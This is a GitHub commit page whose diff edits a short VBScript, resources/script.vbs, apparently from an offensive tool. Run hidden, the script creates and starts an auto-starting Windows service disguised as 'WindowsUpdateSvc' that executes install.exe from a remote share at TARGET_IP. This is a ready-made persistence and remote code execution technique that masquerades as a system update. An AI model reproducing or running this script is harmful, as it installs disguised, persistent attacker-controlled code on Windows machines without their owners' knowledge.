Skip to content

Commit

Permalink
Update script.vbs
Browse files Browse the repository at this point in the history
  • Loading branch information
pimps committed Jul 4, 2017
1 parent d3adf12 commit f981fab
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion resources/script.vbs
Original file line number Diff line number Diff line change
@@ -1,3 +1,3 @@
Set oShell = WScript.CreateObject ("WScript.Shell")
Set oShell = CreateObject("WScript.Shell")
oShell.run "cmd.exe /c sc create WindowsUpdateSvc binpath= \\TARGET_IP\update\install.exe start= auto",0,True
oShell.run "cmd.exe /c sc start WindowsUpdateSvc",0,True

0 comments on commit f981fab

Please sign in to comment.